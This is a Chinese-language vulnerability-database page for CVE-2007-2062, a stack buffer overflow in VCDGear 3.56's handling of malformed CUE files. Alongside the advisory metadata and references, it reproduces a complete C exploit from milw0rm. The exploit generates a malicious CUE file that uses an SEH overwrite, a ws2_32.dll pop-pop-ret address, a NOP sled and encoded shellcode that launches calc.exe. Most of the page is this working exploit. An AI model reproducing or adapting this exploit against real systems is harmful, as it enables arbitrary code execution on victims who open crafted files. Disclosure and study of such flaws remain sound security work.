VCDGear畸形CUE文件处理栈缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112707 漏洞类型 缓冲区溢出
发布时间 2007-04-13 更新时间 2008-11-04
CVE编号 CVE-2007-2062 CNNVD-ID CNNVD-200704-293
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/3727
https://www.securityfocus.com/bid/23475
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-293
|漏洞详情
VCDGear是制作MPEG4的工具,用于将VCD影片DAT文件转换为MPEG文件。VCDGear在处理畸形格式的CUE文档时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞通过诱使用户打开恶意文件控制用户用户机器。如果用户使用VCDGear加载了恶意的CUE文件的话,就可能触发栈缓冲区溢出,导致在用户系统上执行任意指令。
|漏洞EXP
/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: InTeL
Auther: InTeL
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: VCDGear v3.56 build 050213
Website: www.vcdgear.com
Description:

"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG, 
correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has 
grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow 
different machines to process and generate output that is compatible between one another. 

Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]

Greetz: erazerz, m03, devcode, #pen15
*/

#include <stdlib.h>
#include <stdio.h>

// Exec Calc.exe Scode
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";


int main(int argc, char *argv[])
{
	FILE *handle;

	if(argc < 2) {
		printf("0day VCDGear exploit\n");
		printf("Usage: %s <output CUE file>", argv[0]);
		return 0;
	}

	if(!(handle = fopen(argv[1], "w"))) {
		printf("[+] Error");
		return 0;
	}

	fputs("FILE \"", handle);
	for (int i=0;i<324;i++) \
		fputs("A", handle);
	
	fputs("\xeb\x32\x90\x90", handle);
	fputs("\x3a\x1f\x03\x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 	5.0.2195.6601)
	for (i=0;i<200;i++) 
		fputs("\x90", handle);

	fputs((char *)scode, handle);
	fputs("\" BINARY\n", handle);
	fputs(" TRACK 01 MODE2/2352\n", handle);
	fputs(" INDEX 01 00:00:00\n", handle);
	
	fclose(handle);
	
	printf("[+] File successfully created");

	return 0;
}

// milw0rm.com [2007-04-13]
|受影响的产品
VCDGear VCDGear 3.5.6
|参考资料

来源:XF
名称:vcdgear-seh-bo(33642)
链接:http://xforce.iss.net/xforce/xfdb/33642
来源:BID
名称:23475
链接:http://www.securityfocus.com/bid/23475
来源:BUGTRAQ
名称:20070414VCDGear<=3.56Build050213(FILE)LocalCodeExecutionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/465725/100/0/threaded
来源:SECUNIA
名称:24884
链接:http://secunia.com/advisories/24884
来源:MILW0RM
名称:3727
链接:http://milw0rm.com/exploits/3727